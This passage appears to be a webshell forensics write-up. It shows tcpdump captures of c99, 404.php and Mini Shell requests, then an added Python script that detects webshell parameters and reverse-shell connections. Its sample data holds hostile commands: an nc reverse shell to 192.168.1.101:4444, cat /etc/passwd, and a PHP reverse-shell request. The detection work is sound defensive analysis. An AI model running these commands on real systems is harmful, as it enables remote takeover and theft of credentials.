Server: Apache/2.4.18 (Debian)
WWW-Belgele: Basic realm="SpYshell KingDefacer: Restricted area"
Content-Length: 87
Connection: close
Content-Type: text/html; charset=UTF-8

<a href="http://xxxxxxxxxxxxxxxxxxxxxxxx">SpYshell v.KingDefacer</a>: Erisim Engellendi

2017-01-20 03:22:56.211184 IP 192.168.1.102.54114 > 192.168.1.100.55555: Flags [P.], seq 1:624, ack 1, win 2053, length 623
E…..@…X….f…d.b……..E<P…x=..POST /c99.php?ry4wn[login]=0 HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 39127
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLoRtloEXoMSV9bhy
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/c99.php?ry4wn[login]=0
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8

2017-01-20 03:22:56.211200 IP 192.168.1.100.55555 > 192.168.1.102.54114: Flags [.], ack 624, win 238, length 0
E..(.`@.@..T…d…f…b..E<…7P….5..
2017-01-20 03:22:56.211450 IP 192.168.1.102.54114 > 192.168.1.100.55555: Flags [.], seq 624:5004, ack 1, win 2053, length 4380
E..D..@…I….f…d.b…..7..E<P….Q..------WebKitFormBoundaryLoRtloEXoMSV9bhy
Content-Disposition: form-data; name="act"

upload
------WebKitFormBoundaryLoRtloEXoMSV9bhy
Content-Disposition: form-data; name="uploadfile"; filename="logo.png"
Content-Type: image/png

.PNG
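Detection logic for the three captures above (the pass= prompt and a=Console/p1 console of 404.php, the cmdexe and rev_option requests of the Mini Shell, the [login] parameter of c99), correlated with the web server's own outbound SYN right after a command request. This is an added example, not code from the original post; SAMPLE is a constructed, trimmed copy of the page's tcpdump text, and the parameter names matched are only the ones seen in these captures.

```python
import re
from datetime import datetime
from urllib.parse import parse_qs, urlsplit
# Constructed sample: the request and SYN packets from this page's tcpdump -A
# captures, with the binary packet-header residue trimmed to "E....".
SAMPLE = """\
2017-01-20 02:34:28.742646 IP 192.168.1.102.53296 > 192.168.1.100.55555: Flags [P.], length 613
E....POST /404.php HTTP/1.1

pass=letmein
2017-01-20 02:35:30.139077 IP 192.168.1.102.53304 > 192.168.1.100.55555: Flags [P.], length 711
E....POST /404.php HTTP/1.1

a=Console&c=%2Fvar%2Fwww%2Fhtml%2F&p1=nc+-nv+192.168.1.101+4444+-e+%2Fbin%2Fbash&p2=&p3=&charset=Windows-1251
2017-01-20 02:35:30.611285 IP 192.168.1.100.56704 > 192.168.1.101.4444: Flags [S], seq 3216154078, length 0
2017-01-20 03:22:31.946998 IP 192.168.1.102.54059 > 192.168.1.100.55555: Flags [P.], length 399
E....GET /c99.php?ry4wn[login]=0 HTTP/1.1
2017-01-20 04:55:04.451424 IP 192.168.1.102.56136 > 192.168.1.100.55555: Flags [P.], length 553
E....GET /minishell.php?path=%2Fvar%2Fwww%2Fhtml&cmdexe=cat+%2Fetc%2Fpasswd HTTP/1.1
2017-01-20 04:56:35.021686 IP 192.168.1.102.56180 > 192.168.1.100.55555: Flags [P.], length 565
E....GET /minishell.php?rev_option=PHP+Reverse+Shell&my_ip=192.168.1.101&my_port=4444 HTTP/1.1
2017-01-20 04:56:35.022202 IP 192.168.1.100.57978 > 192.168.1.101.4444: Flags [S], seq 3778293001, length 0
"""

PKT_RE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) IP (\d+\.\d+\.\d+\.\d+)\.\d+ > "
                    r"(\d+\.\d+\.\d+\.\d+)\.(\d+): Flags \[([^\]]+)\]", re.M)
REQ_RE = re.compile(r"(GET|POST) (\S+) HTTP/1\.[01]")

def split_packets(text):
    """Yield (timestamp, src, dst, dport, flags, payload) per tcpdump packet."""
    heads = list(PKT_RE.finditer(text))
    for i, m in enumerate(heads):
        end = heads[i + 1].start() if i + 1 < len(heads) else len(text)
        yield (datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S.%f"), m.group(2),
               m.group(3), int(m.group(4)), m.group(5), text[m.end():end])

def parse_request(payload):
    """Return (method, path, params) for an HTTP request in the payload, else None."""
    m = REQ_RE.search(payload)  # search, not match: header residue precedes it
    if not m:
        return None
    url = urlsplit(m.group(2))
    params = parse_qs(url.query, keep_blank_values=True)
    parts = payload[m.end():].split("\n\n", 1)  # blank line ends the headers
    if len(parts) == 2:  # merge the form body: these shells use query or body for commands
        params.update(parse_qs(parts[1].strip(), keep_blank_values=True))
    return m.group(1), url.path, {k: v[0] for k, v in params.items()}

def classify(params):
    """Map request parameters to the shell behaviours seen in the captures."""
    hits = []
    if params.get("a") == "Console" and "p1" in params:
        hits.append(("wso-style console command", params["p1"]))
    if "cmdexe" in params:
        hits.append(("minishell command", params["cmdexe"]))
    if {"rev_option", "my_ip", "my_port"} <= set(params):
        hits.append(("minishell reverse shell request", params["my_ip"] + ":" + params["my_port"]))
    if any(re.fullmatch(r"\w+\[login\]", k) for k in params):
        hits.append(("c99-style login parameter", ""))
    if set(params) == {"pass"}:
        hits.append(("password-only POST (404.php prompt)", ""))
    return hits

def analyze(text, webserver_ip, window_s=5.0):
    """Webshell-request alerts, plus web-server SYNs within window_s of a command."""
    alerts, last_cmd = [], None
    for ts, src, dst, dport, flags, payload in split_packets(text):
        req = parse_request(payload) if dst == webserver_ip else None
        if req:
            method, path, params = req
            for label, detail in classify(params):
                alerts.append(f"{ts} {src} {method} {path}: {label} {detail}".rstrip())
                if "command" in label or "reverse shell" in label:
                    last_cmd = ts
        elif src == webserver_ip and flags == "S" and last_cmd is not None:
            delta = (ts - last_cmd).total_seconds()
            if 0 <= delta <= window_s:  # in the captures the pivot follows within a second
                alerts.append(f"{ts} {src} opened outbound TCP to {dst}:{dport} "
                              f"{delta:.3f}s after a command request (reverse shell?)")
    return alerts

if __name__ == "__main__":
    for line in analyze(SAMPLE, "192.168.1.100"):
        print(line)
```

Run against a real tcpdump -A dump of the web server's port, the outbound-SYN rule is the one that survives a renamed shell, since the server itself should never be opening connections to client hosts on 4444.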